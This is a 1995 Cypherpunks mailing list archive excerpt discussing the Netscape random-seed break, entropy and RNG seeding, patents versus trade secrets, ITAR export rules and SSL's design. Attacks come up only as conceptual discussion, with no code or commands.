jamesd at echeque.com Wed Sep 20 22:32:16 1995 From: jamesd at echeque.com (James A. Donald) Date: Wed, 20 Sep 95 22:32:16 PDT Subject: "random" number seeds vs. Netscape Message-ID: <199509210531.WAA09687@blob.best.net> At 05:01 PM 9/20/95 -0400, Perry E. Metzger wrote: >PC timers inherently run at Mhz speed -- they interrupt every 100th of >a second but you can get finer resolution by querying the clock >chip. Does Windows let you do this? Yes: 1.196 MHz precision. The VTD maintains a 64-bit value that is accurate to 0.8 microseconds. This value is obtained by calling the VTD with AX set to 0100h. The 64-bit value is returned in EDX:EAX. The returned value indicates the time Windows has been running based on a 1.196 MHz clock. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From iagoldbe at csclub.uwaterloo.ca Wed Sep 20 22:32:57 1995 From: iagoldbe at csclub.uwaterloo.ca (Ian Goldberg) Date: Wed, 20 Sep 95 22:32:57 PDT Subject: Cypherpunks Hold a Cracking Party In-Reply-To: <199509201812.OAA28709@panix.com> Message-ID: <43qtdn$jbu@calum.csclub.uwaterloo.ca> In article <199509201812.OAA28709 at panix.com>, Duncan Frissell wrote: > >"Anyone know any publications interested in an article on the Crack?" > How many more can there be? I must have given interviews to a large percentage of them by now. :-) Luckily, it's starting to subside. I actually had almost a whole hour today during which nobody called. Was it like this for Damien? - Ian "whose brain melted after Monday's deluge" From iagoldbe at csclub.uwaterloo.ca Wed Sep 20 22:36:19 1995 From: iagoldbe at csclub.uwaterloo.ca (Ian Goldberg) Date: Wed, 20 Sep 95 22:36:19 PDT Subject: Munitions shirt (again) In-Reply-To: Message-ID: <43qtjt$kch@calum.csclub.uwaterloo.ca> In article , Timothy C. May wrote: > >Ian did great work on the latest Netscape break, but this is just plain crazy. > Just some random thoughts while my brain is goo... :-) - Ian "that, and I'm trying to figure out your country's legal system..." From rrothenb at ic.sunysb.edu Wed Sep 20 22:36:42 1995 From: rrothenb at ic.sunysb.edu (Deranged Mutant) Date: Wed, 20 Sep 95 22:36:42 PDT Subject: What's with the list? (Old mail?!) Message-ID: <199509210536.BAA17421@libws4.ic.sunysb.edu> Anyone else get old c'punks postings remailed to them from August? From Randy at mci.net Wed Sep 20 22:38:24 1995 From: Randy at mci.net (Randy Catoe) Date: Wed, 20 Sep 95 22:38:24 PDT Subject: USA Today on Fear of Credit Cards over Net Message-ID: <01HVIQUUZ6HU8WX6TO@MAILSRV1.PCY.MCI.NET> At 07:35 PM 9/20/95 -0400, Perry E. Metzger wrote: > >Re: The risk of credit cards. > >I suppose that indeed there are large risks elsewhere in the credit >card system. However, I think that the credit card system itself is >stupid and insecure and ought to be scrapped -- sending around account >numbers as magic keys to get payment is a stupid move. Its not >suprising how large credit card fraud is. > >One of the great hopes I have for cryptographic technology is its >ability to lower the incidence of fraud, and thus lower transaction >costs a lot. Someday, hopefully, everyone will be able to be a credit >card merchant because you won't have to trust the merchants not to >steal. > >Perry > > I'm told that the revenue lost to fraud in the credit card industry is around .15 percent of the gross purchase value. I'm also told that the credit card companies actually face higher costs from disputes, i.e. when you call them up and busy out a person to resolve a question on you bill. Randy From hallam at w3.org Wed Sep 20 22:43:20 1995 From: hallam at w3.org (hallam at w3.org) Date: Wed, 20 Sep 95 22:43:20 PDT Subject: Please send me SSL problems... In-Reply-To: <9509201715.AA19393@sulphur.osf.org> Message-ID: <9509210543.AA02352@zorch.w3.org> Rich Salz writes >I've heard that Digital, HP, and IBM have all mandated that all security >code (except keymgmt and other things that are out of scope) must go >through the GSSAPI: no writing your own stuff. I heard, less >authoritatively, that Microsoft has the same rules, except they use a >FunnyLookingVariant(far) of an earlier GSSAPI draft. None of these organisations have mentioned GSSAPI to me. Do you have a source? David Van Wie writes >Many technologies have both patented parts and trade >secret parts. Often, >companies will maintain information that is in patent applications as trade >secret until they are granted. I guess I should say _if_ they are granted! > After a patent is granted, it is usually a good idea to also maintain some >trade secrets in your products -- since trade secrets never "expire," unlike >patents. If the patent isn't granted, you still have the option of treating >the contents as an intellectual property under trade secret protection. Rubish, disclosure is required for a grant of a patent. Unless someone skilled in the art can duplicate the invention from the patent claim you don't get a patent issued. Trade secret protection is very tricky in any case. Its practically useless if you want to protect a product rather than a procedure. From iagoldbe at csclub.uwaterloo.ca Wed Sep 20 22:47:57 1995 From: iagoldbe at csclub.uwaterloo.ca (Ian Goldberg) Date: Wed, 20 Sep 95 22:47:57 PDT Subject: Patents and trade secrets was: Encryption algorithms used in PrivaSoft (fwd) In-Reply-To: <3060D3B3@hamachi> Message-ID: <43qu9q$nbd@calum.csclub.uwaterloo.ca> In article <3060D3B3 at hamachi>, David Van Wie wrote: > >David Clavadetscher of PrivaSoft writes: >> At this time our crypto engine is patented and proprietary. > >Ian Goldberg writes: >> Waitasec... I was under the impression that if you patented it, you had >to >> reveal it. That's why RC4 isn't patented (it used to be a trade secret). > >Many technologies have both patented parts and trade secret parts. Often, >companies will maintain information that is in patent applications as trade >secret until they are granted. I guess I should say _if_ they are granted! But don't they have to put something on the patent application? Can they claim trade secret status for something that was on a patent application, but rejected? That seems like they're getting it both ways. They should probably have to choose whther or not they want to show anyone their "secret". If not, it stays a trade secret. If so, it's not a secret anymore, and they hope it's "nonobvious, etc." enough to be granted a patent. - Ian "I heard that 'x*y=[(x+y)/2]^2 - [(x-y)/2]^2' is a patented way to multiply numbers of the same parity. Can anyone verify this and/or produce a reference?" From gnu at toad.com Wed Sep 20 22:52:27 1995 From: gnu at toad.com (John Gilmore) Date: Wed, 20 Sep 95 22:52:27 PDT Subject: Netscape is doing well -- give 'em a break. In-Reply-To: <199509202041.NAA07036@comsec.com> Message-ID: <9509210552.AA07852@toad.com> > > around at the time that this code was being written. I must admit that > > the RNG seed code was not an area that I thought to examine when I took > > over our security library. > > I don't know what your background is, so don't take this as a > personal attack please, but someone who is trained in computer > security and cryptography implementation should *know* to check these > things. Hell, even I would check those things, and I'm not a > cryptographer by any means. Hey folks, lighten up! Netscape is to be commended for even *putting* crypto into their product! Of course the first version is going to have a few screwups; they're in a fast market and things must be done in a hurry. But they are showing a real committment to securing Internet privacy and commerce -- with real algorithms and without key escrow. They hired a real cryptographer, and their security programmer is a cypherpunk. They've told the world they will put the real "domestic" version out for public use. This is a step that a very small number of companies even bother with; most don't even have a high-security unexportable version. They're combing the net for better random number algorithms. We could do a lot worse! Cygnus' Kerberos faced the same random-seed problems and punted in similar ways. Our random numbers are derived from the time and the PID and etc. You can read the sources to see. Ted Ts'O claims it is harder to exploit them because they're mixed in (with DES encryption) with a secret key, either the Kerberos database's master key on the server, or the session key from the ticket on the client. But I haven't done a full blown security analysis of this scheme. I was too busy trying to productize it on eight platforms, write real documentation, do customer support, and make it run on the *^*&%&&# Macintosh. I did have it marked in my mind as something to look at "when I had the time". If you-all have the time, hey, go for it! Might as well look at the one in MIT K5, since that's the development tree from which all future Kerberoses will come. All progress is by steps. Let's step on each others' shoulders, not on each others' toes. Netscape is doing us a favor by pushing strong crypto. We are doing them a favor by pointing out problems before they cause major losses to Netscape customers. The result is higher security for everyone, and more respect for each other's efforts. So kindly show them a little... John Gilmore From dvw at hamachi.epr.com Wed Sep 20 22:55:00 1995 From: dvw at hamachi.epr.com (David Van Wie) Date: Wed, 20 Sep 95 22:55:00 PDT Subject: Entropy vs Random Bits Message-ID: <3060FDCD@hamachi> I've been watching the debate and discussion unfold on usable sources of random data from environments, user actions, etc. I have a vocabulary question (and something of a bone to pick as a mathematician and physicist). Usually, the term "entropy" is being used to characterize one of two different things: (i) random data, as in "300 bits of entropy," and (ii) the "randomness" of data (i.e. high degree of variance in a statistic drawn from it), as in "you can find a lot of entropy in the low order bits of a timed interval between keystrokes." I suspect that there are other shades of meaning intended in other uses as well. This is odd. The term entropy describes an aspect of thermodynamic equlibrium in physical systems. Although sometimes used as a synonym for "random," that definition is vernacular, not technical. In fact, there is no meaningful relationship between "entropy" and random data of the type described in the postings related to seed values. In the presense of a perfectly suitable and precise mathematical term (i.e. random), why invent new terms? Why use them to mean at least two different things? dvw From starrd at starrd Wed Sep 20 22:55:31 1995 From: starrd at starrd (starrd@iia2.org) Date: Wed, 20 Sep 95 22:55:31 PDT Subject: your mail In-Reply-To: Message-ID: On Wed, 20 Sep 1995 owner-cypherpunks at toad.com wrote: > ( \ > Finger for public key \ ) > Strong-arm for secret key / <-- minor groove > Thumb-screws for pass-phrase / ) > > I love your phrase, I hope you don't mind...I added it to my .sig. :) ||||||||||||email address: starrd at iia2.org or starrd at cinenet.net||||||||||| | Creator of the original | Get paid to upload | | Patriot's Archives \ shareware to BBSes and | | ftp: iia.org /pub/users/patriot \_____ the Internet! | | ftp: wuarchive.wustl.edu /pub/msdos_uploads/patriot\ Get file: | | For index of available files: descript.ion \ uploader.zip | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||| Finger for PGP public key, strong-arm for secret key, thumbscrews for passphrase... From hallam at w3.org Wed Sep 20 23:02:49 1995 From: hallam at w3.org (hallam at w3.org) Date: Wed, 20 Sep 95 23:02:49 PDT Subject: Euro-Clipper In-Reply-To: <199509210102.SAA15389@cory.EECS.Berkeley.EDU> Message-ID: <9509210602.AA02445@zorch.w3.org> > It relates that the policy was approved on the 8th September at > Strasbourg by the Council, and coincides with an attempt by the > European Commission to propose a pan-European encryption standard. The > Council - unlike the Commission - has no statutory powers to enforce > its recommendations. However, Peter Csonka, the chairman of the > committee that drafted the document (and an administrative officer at > the Council's division of crime problems) says that `it is rare for > countries to reject Council of Europe recommendations'. It may be rare for a council of Europe recommendation to be rejected but that is because they can be ignored. Actually the Dutch have completely ignored the edicts concerning Drugs, the British routinely ignore anything they don't like in the EU where there is a parliamentary element. Don't expect them to snap to attention at the council of Europe. Until there is a law actually passed in the UK there is no change in the status quo, same for the other european countries. > I for one will be making clear to my MP that his stand on this issue > will determine how I cast my ballot at the next election. So you would rather have a Tory government plus a promise to permit crypto than a Labour government plus a promise to repeal the criminal justice act? Be real, even the freedom issue alone there are other factors to weigh in the balance. Plus any Tory promise would have to be considered as trustworthy as their line at the last election on taxes. I can possibly see a choice between LibDem and Labour on this issue alone, I don't think that many people will consider it the major issue at the next election though. On the other hand you might be able to influence a person looking to become a candidate in a consitituency. One vote on a selection committee can make a big difference. In other words if you want to make cryptography an issue you will have to hack it at the party level. Phill From iagoldbe at csclub.uwaterloo.ca Wed Sep 20 23:03:56 1995 From: iagoldbe at csclub.uwaterloo.ca (Ian Goldberg) Date: Wed, 20 Sep 95 23:03:56 PDT Subject: [NOISE] "hacker" was: first virtual "security" In-Reply-To: Message-ID: <43qv7h$qog@calum.csclub.uwaterloo.ca> In article <0kMA2EqMc50eMEb4Yx at nsb.fv.com>, Nathaniel Borenstein wrote: >If an SSL-like scheme were in wide use world-wide, the hacker who just >made a name for himself by breaking SSL could instead have gone down in Ugh. That word again. I'm only 22, but I'm old enough to remember when there were people called "crackers", and being called a "hacker" was a _good_ thing. I know at least one article about the break went, "Two hackers in Berkeley, California...". We actually got questions from reporters asking why we didn't just use our newly-found hole to snoop financial transactions. I've done a lot of root-breaking in my (short) time, but I work for the Good Guys (TM). - Ian "hey, I warned you it was noise" From karlton at ghoti.mcom.com Wed Sep 20 23:06:30 1995 From: karlton at ghoti.mcom.com (Phil Karlton) Date: Wed, 20 Sep 95 23:06:30 PDT Subject: (none) In-Reply-To: <199509201509.IAA19829@blob.best.net> Message-ID: <43qvbk$lra@tera.mcom.com> James A. Donald writes: Whenever you need a random number, take a one way checksum, for example MD5, of the most recently altered part of that buffer. Use that as your random number. How is this any better than feeding the data into the MD5 hash as I go? This is not a rhetorical question. PK -- -- Philip L. Karlton karlton at netscape.com Principal Curmudgeon http://www.netscape.com/people/karlton Netscape Communications Corporation From iagoldbe at csclub.uwaterloo.ca Wed Sep 20 23:12:00 1995 From: iagoldbe at csclub.uwaterloo.ca (Ian Goldberg) Date: Wed, 20 Sep 95 23:12:00 PDT Subject: FROM A FRIEND . . . In-Reply-To: <199509201648.MAA14624@panix.com> Message-ID: <43qvn4$mm@calum.csclub.uwaterloo.ca> In article <43qrhf$gd5 at tera.mcom.com>, Jeff Weinstein wrote: > I think that the general opinion of engineers and management here at >Netscape is that it would be A Really Good Thing to have our US-only >128+ bit version of Netscape Navigator available for download by US >citizens and others who are not legally prohibited from using it. Who _is_ legally prohibited from using it? I think there are some countries where the very use of crypto is illegal (could someone please list them?), but who else? There are some people that may be legally prohibited from _obtaining_ it from a US site (ITAR yadda), but even so, if JRFurriner downloads crypto from company C's site in the US, who's guilty of ITAR-violation? Company C for making it available, or JRF for initiating the action that caused the bits to be send out of the country? - Ian "my, I seem to be posting a lot tonight" From dvw at hamachi.epr.com Wed Sep 20 23:23:30 1995 From: dvw at hamachi.epr.com (David Van Wie) Date: Wed, 20 Sep 95 23:23:30 PDT Subject: Patents and trade secrets Message-ID: <3061045B@hamachi> > > Many technologies have both patented parts and trade secret parts. Often, > > companies will maintain information that is in patent applications as trade > > secret until they are granted. I guess I should say _if_ they are granted! > > But don't they have to put something on the patent application? Can they > claim trade secret status for something that was on a patent application, > but rejected? That seems like they're getting it both ways. They should > probably have to choose whther or not they want to show anyone their > "secret". If not, it stays a trade secret. If so, it's not a secret anymore, > and they hope it's "nonobvious, etc." enough to be granted a patent. Sure, they have to put their "best mode" of performing their invention into the patent application. While the patent is pending (at least in the US), the patent application is confidential, so if the patent is denied, or if the patent is not as broad as the inventor would have liked, they can withdraw the application without the information contained in it ever becoming public. In Europe, publication occurs automatically after 18 months, so the inventor has less time there to make a go/no go decision, but they can still do it. In some respects, the existing system gives you most of what you want -- if you can't get patent protection for an idea, you can fall back on trade secret protection (which you didn't have to give up just to try to get a patent). It seems pretty harsh to me that just making a stab at getting a patent would mean that all of your hard work could just slip away into the public domain if it wasn't quite up to snuff. Sure would make me swallow hard.... dvw From jamesd at echeque.com Wed Sep 20 23:27:45 1995 From: jamesd at echeque.com (James A. Donald) Date: Wed, 20 Sep 95 23:27:45 PDT Subject: (none) Message-ID: <199509210627.XAA14935@blob.best.net> At 06:05 AM 9/21/95 GMT, Phil Karlton wrote: >James A. Donald writes: > Whenever you need a random number, take a one way checksum, > for example MD5, of the most recently altered part of that > buffer. Use that as your random number. > > How is this any better than feeding the data into the MD5 > hash as I go? This is not a rhetorical question. Assuming that MD5 loses no entropy, it is identical, or very similar in strength, since in the algorithm that I described the most recently altered part of the buffer depends sensitively on all previous noise accumulated into the buffer, so if the total cumulated entropy is larger than your block size, you are OK. However the algorithm I described simply used less computation, but the overhead of continually doing MD5 is probably modest. No matter what you do, if you cumulate a hundred bits of entropy, and if you use a one way hash to generate random numbers so that your session keys do not leak information about your entropy, you are going to be safe against a random number generator attack. I suggested accumulating a very large amount of entropy, but obviously this is just gilding the lily. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From nelson at santafe.edu Wed Sep 20 23:32:31 1995 From: nelson at santafe.edu (Nelson Minar) Date: Wed, 20 Sep 95 23:32:31 PDT Subject: Netscape is doing well -- give 'em a break. In-Reply-To: <199509202041.NAA07036@comsec.com> Message-ID: <9509210631.AA18308@sfi.santafe.edu> >Netscape is to be commended for even *putting* crypto into their product! I'm impressed with the way Netscape has responded to recent events. It's refreshing to see a company say "yes, we made a mistake in our security software" rather than pretend there's no problem. Word Perfect encryption, anyone? >Cygnus' Kerberos faced the same random-seed problems and punted in >similar ways. Last time I looked, the MIT-MAGIC-COOKIE-1 scheme used in X11R4 had the same problem: the random seed was based on the current time to the microsecond, modulo the granularity of the system clock. I think I figured that on my hardware, if I could figure out which minute the X server started (easy with finger), I'd only have to try a few thousand keys or so. Caveat: I never actually proved the idea. From jamesd at echeque.com Wed Sep 20 23:39:58 1995 From: jamesd at echeque.com (James A. Donald) Date: Wed, 20 Sep 95 23:39:58 PDT Subject: Entropy vs Random Bits Message-ID: <199509210639.XAA15833@blob.best.net> At 11:51 PM 9/20/95 P, David Van Wie wrote: > This is odd. The term entropy describes an aspect of thermodynamic > equlibrium in physical systems. Although sometimes used as a synonym for >"random," that definition is vernacular, not technical. In fact, there is > no meaningful relationship between "entropy" and random data of the type > described in the postings related to seed values. In the presense of a > perfectly suitable and precise mathematical term (i.e. random), Your use of the word random is incorrect: The throw of a dice is random, but only contains 2.6 bits of entropy. The windows VDT counter is very far from being random, but contains roughly sixteen bits of entropy. > why invent new terms? Why use them to mean at least two different things? This is old term of the art, a term of information theory: We use the same word because entropy in information theory has the same measure as entropy in thermodynamics. In both cases the entropy, measured in bits, of an ensemble of possible states is sum of - P(i) * lg[P(i)] over all the possible states. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From dvw at hamachi.epr.com Wed Sep 20 23:43:44 1995 From: dvw at hamachi.epr.com (David Van Wie) Date: Wed, 20 Sep 95 23:43:44 PDT Subject: Patents and trade secrets Message-ID: <3061091A@hamachi> >> After a patent is granted, it is usually a good idea to also maintain some >>trade secrets in your products -- since trade secrets never "expire," unlike >>patents. If the patent isn't granted, you still have the option of treating >>the contents as an intellectual property under trade secret protection. > >Rubish, disclosure is required for a grant of a patent. Unless someone >skilled in the art can duplicate the invention from the patent claim >you don't get a patent issued. Sure disclosure is required. There is no requirement; however, that an invention be your _whole_ product. For example, most automobiles have thousands of patents involved in their creation. It is entirely possible, even commonplace, as I said in my mail, that one or more portions of a product represent practice of patented inventions, and one or more _other_ portions represent trade secrets. >Trade secret protection is very tricky in any case. Its practically >useless if you want to protect a product rather than a procedure. That depends. Obviously, trade secret protection can be very effective for processes involved in manufacturing physical goods. In software, it depends on whether what you are treating as a secret becomes widely known (after which, self-evidently, it is no longer a secret!) For example, if one where to keep the mathematics behind MD5 a trade secret, it is plausible that it would never be "figured out" just from examining object code that implements the algorithm. It doesn't matter if it theoretically could be done, just that it hasn't actually happened. dvw From gnu at toad.com Wed Sep 20 23:44:38 1995 From: gnu at toad.com (John Gilmore) Date: Wed, 20 Sep 95 23:44:38 PDT Subject: netscape's response (source code review) In-Reply-To: <199509202028.NAA06925@comsec.com> Message-ID: <9509210644.AA09480@toad.com> > > "Netscape has also begun to engage an external group of world-class > > security experts who will review our solution to this problem before > > it is sent to customers." > > A group which offered to review the first version, but > > Netscape refused. > Do you mean that cypherpunks offered to review the netscape code > if only we made all the source available on the net? I think "the group" was RSADSI, based on a remark of Jim Bidzos. However, I do think that, like the S1 cipher, your code would get examined for interesting features and flaws by the cypherpunks if you released it. > We will be having at least some of our code reviewed by a > wider audience, but I don't yet know which code, or how wide a review > group. If anyone has specific suggestions for pieces of code that > you would like to see widely reviewed (such as RNG and seed generation) > let me know. It is becoming gradually clearer in cryptanalysis that you can't test security of pieces in isolation. Their interaction with the surrounding code and protocols is key to their security. Ross Anderson's paper at Crypto last month was all about this (``Robustness Principles for Public Key Protocols''). There were also several papers there that showed how you couldn't just treat hash functions like MD5 as black boxes, since embedding them naively into signature protocols made it possible to do things like turn a signed short message into a signed longer (modified!) message. So far the c'punks haven't done anything clever to your protocols; they've exploited basic weaknesses in key length and key generation. There's still a lot of potential in active attacks, three-cornered attacks, replays, etc, that is unexplored. > I realize that some cypherpunks think that we should make all of > our code publicly available. In an ideal world that would be great, > but we live in a world with politicians, crooks, lawyers, stockholders, > etc... Don't expect to see us posting our entire security > library source code to cypherpunks. Naah. I think NCSA should've made Mosaic publicly available, because they wrote it with our tax dollars. And I hold it against them that they started the trend of "zero-cost personal-use binaries but no commercial use" that many Net users still confuse with Real Free Software (free as in freedom). But Netscape owns its code, it can do whatever it wants with it. I'd still encourage you to err on the side of release. The strongest tendency in the security industry is for "security by obscurity", i.e. if we just keep this quiet, nobody will figure it out. Customers, even less sophisticated than vendors, often let the vendors get away with it. But it doesn't stop the crooks, and stopping the crooks is what your customers are paying you to do. Code that gets public scrutiny, like published scientific papers, gets debunked and honed and made to really work. Much faster than code and ideas that only circulate in small, closed groups. The reason Kerberos V5 is a lot more secure than V4 is because its security features and flaws could be publicly discussed. Steve Bellovin wrote a whole paper about what was wrong in V4, and lots of people got to chew on that and think about how to fix it. The question that only Netscape management can estimate is: what damage would it risk to your business, if you released *this much* crypto code instead of *that much*. Particularly if you copyright it and prevent commercial re-use without licensing, I doubt it will help your competitors much. There is the risk of revealing a flaw that makes it easy to crack. That has to be balanced against the risk of having such a flaw and not noticing it for years. And finally, I thought a marketing goal was to make your security scheme (SSL) a standard throughout the industry? In that case, publishing it *and allowing* commercial use would encourage people to adopt it -- which is what I think you want. [We all realize that "publishing" crypto code is unconstitutionally regulated by the State Department. So there are logistics to the release process. But you are presumably solving them for the 128-bit domestic version; you can use the same procedures to let people download whatever crypto source code you release.] John Gilmore From thad at hammerhead.com Wed Sep 20 23:52:44 1995 From: thad at hammerhead.com (Thaddeus J. Beier) Date: Wed, 20 Sep 95 23:52:44 PDT Subject: Patents and trade secrets was: Encryption algorithms used in PrivaSoft Message-ID: <199509210637.XAA11478@hammerhead.com> > But don't they have to put something on the patent application? Can they > claim trade secret status for something that was on a patent application, > but rejected? That seems like they're getting it both ways. At this point, in this country, a patent is secret until it is issued. It is interesting to note that the process of issuing a patent can take an indefinite period, and to some extent it is in the control of the person seeking the patent. The typical slimy thing to do is to file for a patent, and keep it a trade secret too. Delay the issuance until somebody discovers your secret, then allow the patent to be issued. This is called a "submarine" patent. It allows the best of both worlds, and extends the patent as far in to the future as possible (17 years from issue date, in this country, regardless of filing date). You can delay the patent's issuance by continuing to file amendments to it. Gilbert Hyatt's recent patent on microprocessors is the classic example. Now, this is all expected to change, to become more harmonious with the rest of the world. The changes that I've heard are 1) Go to first-to-file instead of first-to-invent 2) Life is 20 years from filing date, instead of 17 years from issue date 3) Publicize patents some fixed time from filing date, say 1 year As you can imagine there are armies of lawyers on both sides of the issue, so I don't think that you'll see any changes in the law any time soon, but you never know. thad -- Thaddeus Beier email: thad at hammerhead.com Technology Development vox: 408) 286-3376 Hammerhead Productions fax: 408) 292-8624 From eay at mincom.oz.au Thu Sep 21 00:10:32 1995 From: eay at mincom.oz.au (Eric Young) Date: Thu, 21 Sep 95 00:10:32 PDT Subject: (none) In-Reply-To: <199509210627.XAA14935@blob.best.net> Message-ID: On Wed, 20 Sep 1995, James A. Donald wrote: > However the algorithm I described simply used less computation, but the > overhead of continually doing MD5 is probably modest. On a 486DX50 Solaris 2.4 I can do about 40,000 md5's per second. (if input is < 56 bytes and contiguious). With an mixing algorithm this fast, you could use it once per byte and still have an acceptable RNG. It is definitly my hash function of choice :-). eric -- Eric Young | Signature removed since it was generating AARNet: eay at mincom.oz.au | more followups than the message contents :-) From dvw at hamachi.epr.com Thu Sep 21 00:25:01 1995 From: dvw at hamachi.epr.com (David Van Wie) Date: Thu, 21 Sep 95 00:25:01 PDT Subject: Entropy vs Random Bits Message-ID: <306112E3@hamachi> >Your use of the word random is incorrect: The throw of a dice is >random, but only contains 2.6 bits of entropy. The throw isn't random, the data read from the die after it is thrown is random. The use of the term in many of the postings I have read indicate the need for an "unpredictable" quantity in most cases. This quantity may be drawn from a source that has entropy, but it is random. >> why invent new terms? Why use them to mean at least two different things? >This is old term of the art, a term of information theory: We use >the same word because entropy in information theory has the same >measure as entropy in thermodynamics. > >In both cases the entropy, measured in bits, of an ensemble of >possible states is sum of - P(i) * lg[P(i)] over all the possible states. In thermodynamics, counting states in this fashion is a dicey proposition, but I appreciate the clarification. Still, it seems to me that the property "bits of entropy" is often substituted for the actual "bits of random data" and is just as puzzling as gathering the "entropy of cool steam"! One can't _do_ anything with a dimensionless measurement. By which I mean, the measure of a property of data is not the data itself, so it still seems like the usage is odd, at times. However, your explanation does address some of the phrases I have seen. Does this mean that entropy is conserved in information theory? dvw From jsw at neon.netscape.com Thu Sep 21 00:30:00 1995 From: jsw at neon.netscape.com (Jeff Weinstein) Date: Thu, 21 Sep 95 00:30:00 PDT Subject: FROM A FRIEND . . . In-Reply-To: <199509201648.MAA14624@panix.com> Message-ID: <43r488$met@tera.mcom.com> In article <43qvn4$mm at calum.csclub.uwaterloo.ca>, iagoldbe at calum.csclub.uwaterloo.ca (Ian Goldberg) writes: > In article <43qrhf$gd5 at tera.mcom.com>, > Jeff Weinstein wrote: > > I think that the general opinion of engineers and management here at > >Netscape is that it would be A Really Good Thing to have our US-only > >128+ bit version of Netscape Navigator available for download by US > >citizens and others who are not legally prohibited from using it. > > Who _is_ legally prohibited from using it? I think there are some countries > where the very use of crypto is illegal (could someone please list them?), > but who else? > > There are some people that may be legally prohibited from _obtaining_ it > from a US site (ITAR yadda), but even so, if JRFurriner downloads > crypto from company C's site in the US, who's guilty of ITAR-violation? > Company C for making it available, or JRF for initiating the action > that caused the bits to be send out of the country? Poor choice of words on my part. My understanding is that we can not export our US-only product, except to canada - for the use of canadian citizens. I also believe that it is illegal for anyone except US citizens, permanent residents of the US (green card holders) and Canadian citizens to use it, even within the US. I'm not a lawyer, and I've not read all of ITAR myself, so I could be totally wrong... --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From gnu at toad.com Thu Sep 21 00:37:26 1995 From: gnu at toad.com (John Gilmore) Date: Thu, 21 Sep 95 00:37:26 PDT Subject: Export via FTP: who's to blame? Ask a court! In-Reply-To: <43qvn4$mm@calum.csclub.uwaterloo.ca> Message-ID: <9509210737.AA10902@toad.com> > (ITAR yadda), but even so, if JRFurriner downloads > crypto from company C's site in the US, who's guilty of ITAR-violation? > Company C for making it available, or JRF for initiating the action > that caused the bits to be send out of the country? This is a question that has never been answered by a court. Personally I think that the Congress can't constitutionally set up a scheme that restricts US citizens from communicating with each other to transfer software. Even if it makes it harder to catch foreigners who break the law. Prior restraints on US citizens' communications can only be done if they are "incidental" to a greater government purpose. When their purpose is to restrain the act of communication itself, they lose. It's even clear that they can't prevent US citizens from communicating with foreigners, so the entire crypto software export regime may be unconstitutional. The more research we do on the First Amendment law, the more it looks this way to me. If some hardy soul wants to set up a nice clean situation, like Phil Karn did for the paper-vs-magnetic-media distinction, I'm sure we can find some more pro-bono (zero cost) lawyers who'll take the case for the fun and notoriety. You don't have to break the law to get into court; Phil didn't, for example. You make a situation where the law restricts you, then sue to have the restriction declared invalid. And if you have ever been in court, it's a lot more fun being the Plaintiff than being the Defendant. Doing this will take significant time on your part. Even if the lawyers do 95% of the work, you have to talk with them, review what they write, explain the details in gory detail, and believe in what they're doing for you. And sometimes do things in a way that they are sure is right, even though you yourself aren't sure. And stick with the case even though it would drag on for years through several courts. So it's not something to do lightly. But it's worth it. And it's a lot safer and easier to enforce your civil rights now, than to try to live through the civil war that would follow the slide into authoritarian government. I'd do this case myself, except that I think we should have few single points of failure. If we spread the work around, it's more likely to happen. And your civil rights are safer, because you yourself have learned how to defend them. John From jsw at netscape.com Thu Sep 21 01:07:51 1995 From: jsw at netscape.com (Jeff Weinstein) Date: Thu, 21 Sep 95 01:07:51 PDT Subject: Please send me SSL problems... In-Reply-To: Message-ID: <9509210104.ZM154@tofuhut> On Sep 20, 4:35am, "Erik E. Fair" (Time Keeper) wrote: > Subject: Re: Please send me SSL problems... > Jeff, the SSL specification has a severe *architectural* problem - it > assumes that Internet Protocols are APIs - interface standards, and that > you can just slide a "layer" underneath without anyone noticing. Such is > not the case - all the Internet Protocols are real protocol standards, in > that they specify the syntax, order, and semantics of the actual bits on > the wire. The IETF quite explicitly doesn't care about APIs - that's a host > software issue, and it doesn't matter what the host software looks like (or > even what the machine looks like), so long as it gets the bits on the wire > right, according to the protocol spec. This is how the Internet can make > very strong guarantees about interoperability. > > You can't fiddle with a communication protocol without getting agreement > from everyone about the change, or extend it in a way that is compatible > with the protocol you're modifying, on a per-protocol basis (e.g. adding a > TELNET negotiation option to TELNET for encryption, an FTP command to FTP, > etc). Otherwise, all you've done is made a private, non-interoperable > change to an existing protocol that guarantees interoperability *failures* > between systems that implement the existing specification, versus your own > version of HTTP, or TELNET, or whatever. In short, the SSL specification, > as written, proposes to change all Internet application protocols, globally > - "slide in a layer." That's not how it's done, and it's not the right > place to do it, even if it appears to work in an enclave of systems. My view of SSL is that it should not generally be considered a transparent layer that can be plugged in below any application. I don't consider HTTP on top of SSL to be the same as HTTP, or something that can totally replace HTTP. Thats why we use a different port and call it https: and not http. I think using TELNET and FTP as examples of protocols that can be transparently layered on top of SSL was unfortunate. I've looked at what it takes to make some existing protocols work with SSL, and I'm not convinced that its always appropriate. For example FTP and RCMD use multiple connections, which is a royal pain. It seems that the thing you are objecting to is the wording in the spec, in the "motivation" section, that appears to suggest that the entire internet could run on top of SSL. I think that section of the spec could just be chopped out, and SSL would still be useful today without pretentions of world domination. If a secure IP standard emerges that is widely deployed and provides similar services, I don't see why SSL couldn't just go away (this is my opinion, not an official position of netscape). This was sort of off the top of my head. I've not spent long hours contemplating these questions... --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From jsw at netscape.com Thu Sep 21 01:22:18 1995 From: jsw at netscape.com (Jeff Weinstein) Date: Thu, 21 Sep 95 01:22:18 PDT Subject: Please send me SSL problems... In-Reply-To: Message-ID: <9509210118.ZM154@tofuhut> I don't think that the API that SSLRef export is not particularly interesting. We have no attachment to that API. I would expect someone who gets SSLRef to rework the API to suit their application. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed 